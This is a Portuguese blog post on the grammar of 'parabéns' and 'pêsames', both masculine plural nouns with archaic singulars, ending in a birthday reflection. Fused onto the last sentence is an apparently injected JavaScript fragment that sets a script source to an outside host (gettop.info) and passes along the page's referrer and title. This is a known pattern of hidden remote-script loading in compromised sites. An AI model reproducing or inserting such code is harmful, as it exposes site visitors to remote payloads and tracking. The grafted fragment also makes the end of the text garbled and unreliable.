Meus parabéns!

Em diversas comemorações, um substantivo é corriqueiramente usado: parabéns. Todos sabem que essa palavra denota um cumprimento que tem a finalidade de transmitir felicitações a alguém. Agora, o que poucos sabem é que essa palavra possui uma vasta trajetória nos estudos de língua portuguesa. Acompanhe-me!

A palavra “parabéns” classifica-se gramaticalmente como um substantivo masculino e plural. Por isso o correto é dizer “vamos cantar os parabéns”, “meus parabéns a você”, “esses parabéns estão atrasados”. O determinante que acompanha o substantivo (seja ele um artigo ou um pronome adjetivo) deve sempre estabelecer a devida concordância nominal.

Nesse momento, com certeza, você deve estar se perguntando: Elias, mas, se “parabéns” é plural, existe a forma singular? E eu te respondo: SIM! Apesar de não ser usual, os dicionários e o Vocabulário Oficial da Língua Portuguesa (VOLP) registram a forma “parabém”. Ambos reconhecem, todavia, que essa palavra caiu em desuso. Isso é mais uma prova de que as línguas evoluem. Algumas formas desaparecem, ao passo que outras permanecem.

Obs.: aproveito para fazer aqui um adendo muito importante! Sempre que você tiver dúvida sobre a existência ou a grafia de uma determinada palavra, consulte o VOLP! Ele está disponível no site da Academia Brasileira de Letras (academia.org.br). Além disso, há o aplicativo para smartphones! As duas formas são gratuitas! Pesquise mais, pergunte menos!

O mais interessante é notar que a palavra antônima de “parabéns” também sofre o mesmo processo! O substantivo “pêsames”, usado para indicar condolências ou comiseração em situações de pesar, também é masculino e plural (“os pêsames”, “meus pêsames”). A forma singular também está formalmente registrada – “pêsame” – mas é considerada arcaica.

Em outras palavras, duas palavras com propriedades linguísticas tão comuns, mas que são usadas em momentos completamente diferentes de nossas vidas.

E sabe por que resolvi falar sobre esse assunto? Além de ser dúvida de muitas pessoas, nesta semana (mais especificamente no dia 21 de junho, que também é a data do início do inverno) celebrei mais um ano de vida! E este meu último aniversário me trouxe uma reflexão: qual pessoa no mundo deve sentir a maior felicidade do meu aniversário? Eu mesmo! O dom da vida me foi concedido, e sou muito feliz por compartilhá-lo com diversas pessoas, das mais diversas formas! Sou grato pela oportunidade de viver ao lado de tantas pessoas – presencialmente ou virtualmente.

Que a minha alegria possa contagiar a sua vida, que é tão importante quanto a minha!s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário